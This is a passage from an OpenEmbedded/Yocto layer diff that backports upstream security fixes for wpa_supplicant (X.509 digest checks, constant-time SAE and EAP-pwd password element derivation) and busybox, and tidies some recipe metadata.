+@@ -1834,6 +1834,7 @@ int x509_check_signature(struct x509_certificate *issuer,
+ 		os_free(data);
+ 		return -1;
+ 	}
++	wpa_hexdump(MSG_MSGDUMP, "X509: DigestInfo", hdr.payload, hdr.length);
+ 
+ 	pos = hdr.payload;
+ 	end = pos + hdr.length;
+@@ -1855,6 +1856,8 @@ int x509_check_signature(struct x509_certificate *issuer,
+ 		os_free(data);
+ 		return -1;
+ 	}
++	wpa_hexdump(MSG_MSGDUMP, "X509: DigestAlgorithmIdentifier",
++		    hdr.payload, hdr.length);
+ 	da_end = hdr.payload + hdr.length;
+ 
+ 	if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -1862,6 +1865,23 @@ int x509_check_signature(struct x509_certificate *issuer,
+ 		os_free(data);
+ 		return -1;
+ 	}
++	wpa_hexdump(MSG_MSGDUMP, "X509: Digest algorithm parameters",
++		    next, da_end - next);
++
++	/*
++	 * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++	 * omit the parameters, but there are implementation that encode these
++	 * as a NULL element. Allow these two cases and reject anything else.
++	 */
++	if (da_end > next &&
++	    (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++	     !asn1_is_null(&hdr) ||
++	     hdr.payload + hdr.length != da_end)) {
++		wpa_printf(MSG_DEBUG,
++			   "X509: Unexpected digest algorithm parameters");
++		os_free(data);
++		return -1;
++	}
+ 
+ 	if (x509_sha1_oid(&oid)) {
+ 		if (signature->oid.oid[6] != 5 /* sha-1WithRSAEncryption */) {
+-- 
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
new file mode 100644
index 0000000000..21e65ba961
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
@@ -0,0 +1,609 @@
+From 208e5687ff2e48622e28d8888ce5444a54353bbd Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 27 Aug 2019 16:33:15 +0300
+Subject: [PATCH 1/4] crypto: Add more bignum/EC helper functions
+
+These are needed for implementing SAE hash-to-element.
+
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
+Upstream-Status: Backport
+https://w1.fi/security/2022-1/
+
+CVE: CVE-2022-23303 CVE-2022-23304
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/crypto/crypto.h         | 45 ++++++++++++++++++
+ src/crypto/crypto_openssl.c | 94 +++++++++++++++++++++++++++++++++++++
+ src/crypto/crypto_wolfssl.c | 66 ++++++++++++++++++++++++++
+ 3 files changed, 205 insertions(+)
+
+diff --git a/src/crypto/crypto.h b/src/crypto/crypto.h
+index 15f8ad04cea4..68476dbce96c 100644
+--- a/src/crypto/crypto.h
++++ b/src/crypto/crypto.h
+@@ -518,6 +518,13 @@ struct crypto_bignum * crypto_bignum_init(void);
+  */
+ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len);
+ 
++/**
++ * crypto_bignum_init_set - Allocate memory for bignum and set the value (uint)
++ * @val: Value to set
++ * Returns: Pointer to allocated bignum or %NULL on failure
++ */
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val);
++
+ /**
+  * crypto_bignum_deinit - Free bignum
+  * @n: Bignum from crypto_bignum_init() or crypto_bignum_init_set()
+@@ -612,6 +619,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ 		      const struct crypto_bignum *b,
+ 		      struct crypto_bignum *c);
+ 
++/**
++ * crypto_bignum_addmod - d = a + b (mod c)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum
++ * @d: Bignum; used to store the result of (a + b) % c
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++			 const struct crypto_bignum *b,
++			 const struct crypto_bignum *c,
++			 struct crypto_bignum *d);
++
+ /**
+  * crypto_bignum_mulmod - d = a * b (mod c)
+  * @a: Bignum
+@@ -625,6 +645,28 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ 			 const struct crypto_bignum *c,
+ 			 struct crypto_bignum *d);
+ 
++/**
++ * crypto_bignum_sqrmod - c = a^2 (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result of a^2 % b
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++			 const struct crypto_bignum *b,
++			 struct crypto_bignum *c);
++
++/**
++ * crypto_bignum_sqrtmod - returns sqrt(a) (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++			  const struct crypto_bignum *b,
++			  struct crypto_bignum *c);
++
+ /**
+  * crypto_bignum_rshift - r = a >> n
+  * @a: Bignum
+@@ -731,6 +773,9 @@ const struct crypto_bignum * crypto_ec_get_prime(struct crypto_ec *e);
+  */
+ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e);
+ 
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e);
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e);
++
+ /**
+  * struct crypto_ec_point - Elliptic curve point
+  *
+diff --git a/src/crypto/crypto_openssl.c b/src/crypto/crypto_openssl.c
+index bab33a537293..ed463105e8f1 100644
+--- a/src/crypto/crypto_openssl.c
++++ b/src/crypto/crypto_openssl.c
+@@ -1283,6 +1283,24 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+ 
+ 
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++	BIGNUM *bn;
++
++	if (TEST_FAIL())
++		return NULL;
++
++	bn = BN_new();
++	if (!bn)
++		return NULL;
++	if (BN_set_word(bn, val) != 1) {
++		BN_free(bn);
++		return NULL;
++	}
++	return (struct crypto_bignum *) bn;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ 	if (clear)
+@@ -1449,6 +1467,28 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+ 
+ 
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++			 const struct crypto_bignum *b,
++			 const struct crypto_bignum *c,
++			 struct crypto_bignum *d)
++{
++	int res;
++	BN_CTX *bnctx;
++
++	if (TEST_FAIL())
++		return -1;
++
++	bnctx = BN_CTX_new();
++	if (!bnctx)
++		return -1;
++	res = BN_mod_add((BIGNUM *) d, (const BIGNUM *) a, (const BIGNUM *) b,
++			 (const BIGNUM *) c, bnctx);
++	BN_CTX_free(bnctx);
++
++	return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ 			 const struct crypto_bignum *b,
+ 			 const struct crypto_bignum *c,
+@@ -1472,6 +1512,48 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+ 
+ 
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++			 const struct crypto_bignum *b,
++			 struct crypto_bignum *c)
++{
++	int res;
++	BN_CTX *bnctx;
++
++	if (TEST_FAIL())
++		return -1;
++
++	bnctx = BN_CTX_new();
++	if (!bnctx)
++		return -1;
++	res = BN_mod_sqr((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++			 bnctx);
++	BN_CTX_free(bnctx);
++
++	return res ? 0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++			  const struct crypto_bignum *b,
++			  struct crypto_bignum *c)
++{
++	BN_CTX *bnctx;
++	BIGNUM *res;
++
++	if (TEST_FAIL())
++		return -1;
++
++	bnctx = BN_CTX_new();
++	if (!bnctx)
++		return -1;
++	res = BN_mod_sqrt((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++			  bnctx);
++	BN_CTX_free(bnctx);
++
++	return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ 			 struct crypto_bignum *r)
+ {
+@@ -1682,6 +1764,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+ 
+ 
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++	return (const struct crypto_bignum *) e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++	return (const struct crypto_bignum *) e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ 	if (clear)
+diff --git a/src/crypto/crypto_wolfssl.c b/src/crypto/crypto_wolfssl.c
+index 4cedab4367cd..e9894b335e53 100644
+--- a/src/crypto/crypto_wolfssl.c
++++ b/src/crypto/crypto_wolfssl.c
+@@ -1042,6 +1042,26 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+ 
+ 
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++	mp_int *a;
++
++	if (TEST_FAIL())
++		return NULL;
++
++	a = (mp_int *) crypto_bignum_init();
++	if (!a)
++		return NULL;
++
++	if (mp_set_int(a, val) != MP_OKAY) {
++		os_free(a);
++		a = NULL;
++	}
++
++	return (struct crypto_bignum *) a;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ 	if (!n)
+@@ -1168,6 +1188,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+ 
+ 
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++			 const struct crypto_bignum *b,
++			 const struct crypto_bignum *c,
++			 struct crypto_bignum *d)
++{
++	if (TEST_FAIL())
++		return -1;
++
++	return mp_addmod((mp_int *) a, (mp_int *) b, (mp_int *) c,
++			 (mp_int *) d) == MP_OKAY ?  0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ 			 const struct crypto_bignum *b,
+ 			 const struct crypto_bignum *m,
+@@ -1181,6 +1214,27 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+ 
+ 
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++			 const struct crypto_bignum *b,
++			 struct crypto_bignum *c)
++{
++	if (TEST_FAIL())
++		return -1;
++
++	return mp_sqrmod((mp_int *) a, (mp_int *) b,
++			 (mp_int *) c) == MP_OKAY ?  0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++			  const struct crypto_bignum *b,
++			  struct crypto_bignum *c)
++{
++	/* TODO */
++	return -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ 			 struct crypto_bignum *r)
+ {
+@@ -1386,6 +1440,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+ 
+ 
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++	return (const struct crypto_bignum *) &e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++	return (const struct crypto_bignum *) &e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ 	ecc_point *point = (ecc_point *) p;
+-- 
+2.25.1
+
+From 2232d3d5f188b65dbb6c823ac62175412739eb16 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 2/4] dragonfly: Add sqrt() helper function
+
+This is a backport of "SAE: Move sqrt() implementation into a helper
+function" to introduce the helper function needed for the following
+patches.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/dragonfly.c | 34 ++++++++++++++++++++++++++++++++++
+ src/common/dragonfly.h |  2 ++
+ 2 files changed, 36 insertions(+)
+
+diff --git a/src/common/dragonfly.c b/src/common/dragonfly.c
+index 547be66f1561..1e842716668e 100644
+--- a/src/common/dragonfly.c
++++ b/src/common/dragonfly.c
+@@ -213,3 +213,37 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ 		   "dragonfly: Unable to get randomness for own scalar");
+ 	return -1;
+ }
++
++
++/* res = sqrt(val) */
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++		   struct crypto_bignum *res)
++{
++	const struct crypto_bignum *prime;
++	struct crypto_bignum *tmp, *one;
++	int ret = 0;
++	u8 prime_bin[DRAGONFLY_MAX_ECC_PRIME_LEN];
++	size_t prime_len;
++
++	/* For prime p such that p = 3 mod 4, sqrt(w) = w^((p+1)/4) mod p */
++
++	prime = crypto_ec_get_prime(ec);
++	prime_len = crypto_ec_prime_len(ec);
++	tmp = crypto_bignum_init();
++	one = crypto_bignum_init_uint(1);
++
++	if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
++				 prime_len) < 0 ||
++	    (prime_bin[prime_len - 1] & 0x03) != 3 ||
++	    !tmp || !one ||
++	    /* tmp = (p+1)/4 */
++	    crypto_bignum_add(prime, one, tmp) < 0 ||
++	    crypto_bignum_rshift(tmp, 2, tmp) < 0 ||
++	    /* res = sqrt(val) */
++	    crypto_bignum_exptmod(val, tmp, prime, res) < 0)
++		ret = -1;
++
++	crypto_bignum_deinit(tmp, 0);
++	crypto_bignum_deinit(one, 0);
++	return ret;
++}
+diff --git a/src/common/dragonfly.h b/src/common/dragonfly.h
+index ec3dd593eda4..84d67f575c54 100644
+--- a/src/common/dragonfly.h
++++ b/src/common/dragonfly.h
+@@ -27,5 +27,7 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ 			      struct crypto_bignum *_rand,
+ 			      struct crypto_bignum *_mask,
+ 			      struct crypto_bignum *scalar);
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++		   struct crypto_bignum *res);
+ 
+ #endif /* DRAGONFLY_H */
+-- 
+2.25.1
+
+From fe534b0baaa8c0e6ddeb24cf529d6e50e33dc501 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 3/4] SAE: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/sae.c | 47 +++++++++++++++++++++++++++++++++--------------
+ 1 file changed, 33 insertions(+), 14 deletions(-)
+
+diff --git a/src/common/sae.c b/src/common/sae.c
+index 08fdbfd18173..8d79ed962768 100644
+--- a/src/common/sae.c
++++ b/src/common/sae.c
+@@ -286,14 +286,16 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ 	int pwd_seed_odd = 0;
+ 	u8 prime[SAE_MAX_ECC_PRIME_LEN];
+ 	size_t prime_len;
+-	struct crypto_bignum *x = NULL, *qr = NULL, *qnr = NULL;
++	struct crypto_bignum *x = NULL, *y = NULL, *qr = NULL, *qnr = NULL;
+ 	u8 x_bin[SAE_MAX_ECC_PRIME_LEN];
+ 	u8 x_cand_bin[SAE_MAX_ECC_PRIME_LEN];
+ 	u8 qr_bin[SAE_MAX_ECC_PRIME_LEN];
+ 	u8 qnr_bin[SAE_MAX_ECC_PRIME_LEN];
++	u8 x_y[2 * SAE_MAX_ECC_PRIME_LEN];
+ 	int res = -1;
+ 	u8 found = 0; /* 0 (false) or 0xff (true) to be used as const_time_*
+ 		       * mask */
++	unsigned int is_eq;
+ 
+ 	os_memset(x_bin, 0, sizeof(x_bin));
+ 
+@@ -402,25 +404,42 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ 		goto fail;
+ 	}
+ 
+-	if (!sae->tmp->pwe_ecc)
+-		sae->tmp->pwe_ecc = crypto_ec_point_init(sae->tmp->ec);
+-	if (!sae->tmp->pwe_ecc)
+-		res = -1;
+-	else
+-		res = crypto_ec_point_solve_y_coord(sae->tmp->ec,
+-						    sae->tmp->pwe_ecc, x,
+-						    pwd_seed_odd);
+-	if (res < 0) {
+-		/*
+-		 * This should not happen since we already checked that there
+-		 * is a result.
+-		 */
++	/* y = sqrt(x^3 + ax + b) mod p
++	 * if LSB(save) == LSB(y): PWE = (x, y)
++	 * else: PWE = (x, p - y)
++	 *
++	 * Calculate y and the two possible values for PWE and after that,
++	 * use constant time selection to copy the correct alternative.
++	 */
++	y = crypto_ec_point_compute_y_sqr(sae->tmp->ec, x);
++	if (!y ||
++	    dragonfly_sqrt(sae->tmp->ec, y, y) < 0 ||
++	    crypto_bignum_to_bin(y, x_y, SAE_MAX_ECC_PRIME_LEN,
++				 prime_len) < 0 ||
++	    crypto_bignum_sub(sae->tmp->prime, y, y) < 0 ||
++	    crypto_bignum_to_bin(y, x_y + SAE_MAX_ECC_PRIME_LEN,
++				 SAE_MAX_ECC_PRIME_LEN, prime_len) < 0) {
+ 		wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++		goto fail;
++	}
++
++	is_eq = const_time_eq(pwd_seed_odd, x_y[prime_len - 1] & 0x01);
++	const_time_select_bin(is_eq, x_y, x_y + SAE_MAX_ECC_PRIME_LEN,
++			      prime_len, x_y + prime_len);
++	os_memcpy(x_y, x_bin, prime_len);
++	wpa_hexdump_key(MSG_DEBUG, "SAE: PWE", x_y, 2 * prime_len);
++	crypto_ec_point_deinit(sae->tmp->pwe_ecc, 1);
++	sae->tmp->pwe_ecc = crypto_ec_point_from_bin(sae->tmp->ec, x_y);
++	if (!sae->tmp->pwe_ecc) {
++		wpa_printf(MSG_DEBUG, "SAE: Could not generate PWE");
++		res = -1;
+ 	}
+ 
+ fail:
++	forced_memzero(x_y, sizeof(x_y));
+ 	crypto_bignum_deinit(qr, 0);
+ 	crypto_bignum_deinit(qnr, 0);
++	crypto_bignum_deinit(y, 1);
+ 	os_free(dummy_password);
+ 	bin_clear_free(tmp_password, password_len);
+ 	crypto_bignum_deinit(x, 1);
+-- 
+2.25.1
+
+From 603cd880e7f90595482658a7136fa6a7be5cb485 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 18:52:27 +0200
+Subject: [PATCH 4/4] EAP-pwd: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/eap_common/eap_pwd_common.c | 46 ++++++++++++++++++++++++++-------
+ 1 file changed, 36 insertions(+), 10 deletions(-)
+
+diff --git a/src/eap_common/eap_pwd_common.c b/src/eap_common/eap_pwd_common.c
+index 2b2b8efdbd01..ff22b29b087a 100644
+--- a/src/eap_common/eap_pwd_common.c
++++ b/src/eap_common/eap_pwd_common.c
+@@ -127,7 +127,8 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ 	u8 qr_or_qnr_bin[MAX_ECC_PRIME_LEN];
+ 	u8 x_bin[MAX_ECC_PRIME_LEN];
+ 	u8 prime_bin[MAX_ECC_PRIME_LEN];
+-	struct crypto_bignum *tmp2 = NULL;
++	u8 x_y[2 * MAX_ECC_PRIME_LEN];
++	struct crypto_bignum *tmp2 = NULL, *y = NULL;
+ 	struct crypto_hash *hash;
+ 	unsigned char pwe_digest[SHA256_MAC_LEN], *prfbuf = NULL, ctr;
+ 	int ret = 0, res;
+@@ -139,6 +140,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ 	u8 found_ctr = 0, is_odd = 0;
+ 	int cmp_prime;
+ 	unsigned int in_range;
++	unsigned int is_eq;
+ 
+ 	if (grp->pwe)
+ 		return -1;
+@@ -151,11 +153,6 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ 	if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
+ 				 primebytelen) < 0)
+ 		return -1;
+-	grp->pwe = crypto_ec_point_init(grp->group);
+-	if (!grp->pwe) {
+-		wpa_printf(MSG_INFO, "EAP-pwd: unable to create bignums");
+-		goto fail;
+-	}
+ 
+ 	if ((prfbuf = os_malloc(primebytelen)) == NULL) {
+ 		wpa_printf(MSG_INFO, "EAP-pwd: unable to malloc space for prf "
+@@ -261,10 +258,37 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ 	 */
+ 	crypto_bignum_deinit(x_candidate, 1);
+ 	x_candidate = crypto_bignum_init_set(x_bin, primebytelen);
+-	if (!x_candidate ||
+-	    crypto_ec_point_solve_y_coord(grp->group, grp->pwe, x_candidate,
+-					  is_odd) != 0) {
+-		wpa_printf(MSG_INFO, "EAP-pwd: Could not solve for y");
++	if (!x_candidate)
++		goto fail;
++
++	/* y = sqrt(x^3 + ax + b) mod p
++	 * if LSB(y) == LSB(pwd-seed): PWE = (x, y)
++	 * else: PWE = (x, p - y)
++	 *
++	 * Calculate y and the two possible values for PWE and after that,
++	 * use constant time selection to copy the correct alternative.
++	 */
++	y = crypto_ec_point_compute_y_sqr(grp->group, x_candidate);
++	if (!y ||
++	    dragonfly_sqrt(grp->group, y, y) < 0 ||
++	    crypto_bignum_to_bin(y, x_y, MAX_ECC_PRIME_LEN, primebytelen) < 0 ||
++	    crypto_bignum_sub(prime, y, y) < 0 ||
++	    crypto_bignum_to_bin(y, x_y + MAX_ECC_PRIME_LEN,
++				 MAX_ECC_PRIME_LEN, primebytelen) < 0) {
++		wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++		goto fail;
++	}
++
++	/* Constant time selection of the y coordinate from the two
++	 * options */
++	is_eq = const_time_eq(is_odd, x_y[primebytelen - 1] & 0x01);
++	const_time_select_bin(is_eq, x_y, x_y + MAX_ECC_PRIME_LEN,
++			      primebytelen, x_y + primebytelen);
++	os_memcpy(x_y, x_bin, primebytelen);
++	wpa_hexdump_key(MSG_DEBUG, "EAP-pwd: PWE", x_y, 2 * primebytelen);
++	grp->pwe = crypto_ec_point_from_bin(grp->group, x_y);
++	if (!grp->pwe) {
++		wpa_printf(MSG_DEBUG, "EAP-pwd: Could not generate PWE");
+ 		goto fail;
+ 	}
+ 
+@@ -289,6 +313,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ 	/* cleanliness and order.... */
+ 	crypto_bignum_deinit(x_candidate, 1);
+ 	crypto_bignum_deinit(tmp2, 1);
++	crypto_bignum_deinit(y, 1);
+ 	crypto_bignum_deinit(qr, 1);
+ 	crypto_bignum_deinit(qnr, 1);
+ 	bin_clear_free(prfbuf, primebytelen);
+@@ -296,6 +321,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ 	os_memset(qnr_bin, 0, sizeof(qnr_bin));
+ 	os_memset(qr_or_qnr_bin, 0, sizeof(qr_or_qnr_bin));
+ 	os_memset(pwe_digest, 0, sizeof(pwe_digest));
++	forced_memzero(x_y, sizeof(x_y));
+ 
+ 	return ret;
+ }
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
index 7cc03fef7d..a8fb34b1a1 100644
--- a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Client for Wi-Fi Protected Access (WPA)"
 HOMEPAGE = "http://w1.fi/wpa_supplicant/"
+DESCRIPTION = "wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver."
 BUGTRACKER = "http://w1.fi/security/"
 SECTION = "network"
 LICENSE = "BSD-3-Clause"
@@ -29,6 +30,10 @@ SRC_URI = "http://w1.fi/releases/wpa_supplicant-${PV}.tar.gz  \
            file://0001-WPS-UPnP-Do-not-allow-event-subscriptions-with-URLs-.patch \
            file://0002-WPS-UPnP-Fix-event-message-generation-using-a-long-U.patch \
            file://0003-WPS-UPnP-Handle-HTTP-initiation-failures-for-events-.patch \
+           file://CVE-2021-0326.patch \
+           file://CVE-2021-27803.patch \
+           file://CVE-2021-30004.patch \
+           file://CVE-2022-23303-4.patch \
           "
 SRC_URI[md5sum] = "2d2958c782576dc9901092fbfecb4190"
 SRC_URI[sha256sum] = "fcbdee7b4a64bea8177973299c8c824419c413ec2e3a95db63dd6a5dc3541f17"
diff --git a/meta/recipes-core/base-files/base-files/hosts b/meta/recipes-core/base-files/base-files/hosts
index b94f414d5c..10a5b6c704 100644
--- a/meta/recipes-core/base-files/base-files/hosts
+++ b/meta/recipes-core/base-files/base-files/hosts
@@ -1,4 +1,4 @@
-127.0.0.1	localhost.localdomain		localhost
+127.0.0.1	localhost
 
 # The following lines are desirable for IPv6 capable hosts
 ::1     localhost ip6-localhost ip6-loopback
diff --git a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
index d01cd7e297..65b3cd778d 100644
--- a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
+++ b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Base system master password/group files"
 DESCRIPTION = "The master copies of the user database files (/etc/passwd and /etc/group).  The update-passwd tool is also provided to keep the system databases synchronized with these master files."
+HOMEPAGE = "https://launchpad.net/base-passwd"
 SECTION = "base"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=eb723b61539feef013de476e68b5c50a"
diff --git a/meta/recipes-core/busybox/busybox.inc b/meta/recipes-core/busybox/busybox.inc
index e0522be729..f0c5666f47 100644
--- a/meta/recipes-core/busybox/busybox.inc
+++ b/meta/recipes-core/busybox/busybox.inc
@@ -139,6 +139,10 @@ do_configure () {
 	do_prepare_config
 	merge_config.sh -m .config ${@" ".join(find_cfgs(d))}
 	cml1_do_configure
+
+	# Save a copy of .config and autoconf.h.
+	cp .config .config.orig
+	cp include/autoconf.h include/autoconf.h.orig
 }
 
 do_compile() {
@@ -146,13 +150,17 @@ do_compile() {
 	if [ "${BUILD_REPRODUCIBLE_BINARIES}" = "1" ]; then
 		export KCONFIG_NOTIMESTAMP=1
 	fi
+
+	# Ensure we start do_compile with the original .config and autoconf.h.
+	# These files should always have matching timestamps.
+	cp .config.orig .config
+	cp include/autoconf.h.orig include/autoconf.h
+
 	if [ "${BUSYBOX_SPLIT_SUID}" = "1" -a x`grep "CONFIG_FEATURE_INDIVIDUAL=y" .config` = x ]; then
+		# Guard againt interrupted do_compile: clean temporary files.
+		rm -f .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+
 		# split the .config into two parts, and make two busybox binaries
-		if [ -e .config.orig ]; then
-			# Need to guard again an interrupted do_compile - restore any backup
-			cp .config.orig .config
-		fi
-		cp .config .config.orig
 		oe_runmake busybox.cfg.suid
 		oe_runmake busybox.cfg.nosuid
 
@@ -189,15 +197,18 @@ do_compile() {
 			bbfatal "busybox suid binary incorrectly provides /bin/sh"
 		fi
 
-		# copy .config.orig back to .config, because the install process may check this file
-		cp .config.orig .config
 		# cleanup
-		rm .config.orig .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+		rm .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
 	else
 		oe_runmake busybox_unstripped
 		cp busybox_unstripped busybox
 		oe_runmake busybox.links
 	fi
+
+	# restore original .config and autoconf.h, because the install process
+	# may check these files
+	cp .config.orig .config
+	cp include/autoconf.h.orig include/autoconf.h
 }
 
 do_install () {
@@ -348,7 +359,7 @@ do_install_ptest () {
         # These access the internet which is not guaranteed to work on machines running the tests
         rm -rf ${D}${PTEST_PATH}/testsuite/wget
 	sort ${B}/.config > ${D}${PTEST_PATH}/.config
-	ln -s /bin/busybox   ${D}${PTEST_PATH}/busybox
+	ln -s ${base_bindir}/busybox   ${D}${PTEST_PATH}/busybox
 }
 
 inherit update-alternatives
diff --git a/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
new file mode 100644
index 0000000000..b75f0907e7
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
@@ -0,0 +1,51 @@
+From fe791386ebc270219ca00406c9fdadc5130b64ee Mon Sep 17 00:00:00 2001
+From: Samuel Sapalski <samuel.sapalski@nokia.com>
+Date: Wed, 3 Mar 2021 16:31:22 +0100
+Subject: [PATCH] decompress_gunzip: Fix DoS if gzip is corrupt
+
+On certain corrupt gzip files, huft_build will set the error bit on
+the result pointer. If afterwards abort_unzip is called huft_free
+might run into a segmentation fault or an invalid pointer to
+free(p).
+
+In order to mitigate this, we check in huft_free if the error bit
+is set and clear it before the linked list is freed.
+
+Signed-off-by: Samuel Sapalski <samuel.sapalski@nokia.com>
+Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-28831
+Comment: One hunk from this patch is removed as it was not relevant.
